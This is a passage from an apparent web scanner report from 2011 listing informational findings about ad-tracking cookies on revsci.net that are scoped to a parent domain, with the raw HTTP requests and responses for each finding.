rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV2CTCeM1VkRza8Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:41 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6481&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:41 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:40 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.161. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/129048156.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+CzSWI1VkRWa9k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
NETID01=TUl6gw0BEwoAAF@QVjMAAAAg; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:38:43 GMT; Path=/
udm_0=MLvv7qPvYS5npS5IdtJQSpvhPx/j4C9J+L5/VivkmlUNWmqpgTbMk8TbIk8ExbmKiz7qqx5xOqPBM6CvUdZwtsJINfZM5g518Etlm6Ja5aLTgsyS+qrSyqvVW8YHQCBmffUjH3SUMRXBwFeAhDcM+r2AyK2lxom9mprIS2A4bBa/7umm0SwnaQuLOxTCJow+agJRBjRuO5oRmPeL+dZ9+OxdT1G9Y0Sh8Y9lv7ukyZXMZwHZk9VCEs5lclPuHkivYUkXMdd2KU39wY3dCKvOCpd5BNvp2L6tIUn/1nFhL7cWx1GDxYexYvkF8UJb09nKmQRERwxcaIdllZysZdefm/b6bavCoc1LKhfkV0zt6SbZ4shn/9CShzBMGBxGQrHu0KfdvPrE52Lv7zhS5DeQ/JzqehSYGcWyLZMWEKwtUWW7ixH2qM75Jsh0VWYp12qyam6cwDfzjyeevBWB3zvgXuNYLtX71h/oZ3xz9vhaTt5eVNkh1QeNODvWt/FJq5nekH1Sv3NOG6aidjRIQ/Rux8zKtmPGqbLDM4z2+L3Jg82VAnOMPJB1bZeohQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/129048156.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+CzSWI1VkRWa9k=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
Set-Cookie: NETID01=TUl6gw0BEwoAAF@QVjMAAAAg; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:38:43 GMT; Path=/
Set-Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPx/j4C9J+L5/VivkmlUNWmqpgTbMk8TbIk8ExbmKiz7qqx5xOqPBM6CvUdZwtsJINfZM5g518Etlm6Ja5aLTgsyS+qrSyqvVW8YHQCBmffUjH3SUMRXBwFeAhDcM+r2AyK2lxom9mprIS2A4bBa/7umm0SwnaQuLOxTCJow+agJRBjRuO5oRmPeL+dZ9+OxdT1G9Y0Sh8Y9lv7ukyZXMZwHZk9VCEs5lclPuHkivYUkXMdd2KU39wY3dCKvOCpd5BNvp2L6tIUn/1nFhL7cWx1GDxYexYvkF8UJb09nKmQRERwxcaIdllZysZdefm/b6bavCoc1LKhfkV0zt6SbZ4shn/9CShzBMGBxGQrHu0KfdvPrE52Lv7zhS5DeQ/JzqehSYGcWyLZMWEKwtUWW7ixH2qM75Jsh0VWYp12qyam6cwDfzjyeevBWB3zvgXuNYLtX71h/oZ3xz9vhaTt5eVNkh1QeNODvWt/FJq5nekH1Sv3NOG6aidjRIQ/Rux8zKtmPGqbLDM4z2+L3Jg82VAnOMPJB1bZeohQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:43 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:43 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.162. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/157224151.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF2BTiOM1VkRNa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:21 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a9&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/157224151.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCF2BTiOM1VkRNa9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:21 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a9&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:20 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.163. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/164892384.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkPwRX+Mer9duzVms/xJMa; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/164892384.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkPwRX+Mer9duzVms/xJMa; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:20 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:20 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:19 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.164. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/213412415.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/dmP4TX+ser9duzVms895ML; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:38 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647e&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/213412415.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; 